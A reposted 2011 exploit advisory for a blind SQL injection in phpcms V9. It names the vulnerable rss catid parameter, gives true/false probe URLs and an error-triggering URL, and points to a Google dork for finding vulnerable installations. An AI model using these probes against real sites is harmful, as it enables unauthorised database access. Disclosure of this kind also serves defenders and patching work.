phpcms V9 BLind SQL Injection Vulnerability

精选转载

obnus 2011-01-23 01:44:04 博主文章分类：漏洞收集备用

=================================================================

=================================================================

Software: phpcms V9

Vendor: www.phpcms.cn

Vuln Type: BLind SQL Injection

Download link: http://www.phpcms.cn/2010/1229/326.html

Author: eidelweiss

contact: eidelweiss[at]windowslive[dot]com

Home: www.eidelweiss.info

Google Dork: http://www.exploit-db.com/ghdb/3676/ // check here ^_^

References:

http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html

=================================================================

exploit & p0c

[!] index.php?m=content&c=rss&catid=[valid catid]

Example p0c

[!] http://host/index.php?m=content&c=rss&catid=10 <= True

[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

=================================================================

Nothing Impossible In This World Even Nobody`s Perfect

=================================================================

=========================| -=[ E0F ]=- |=========================

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯

51CTO博客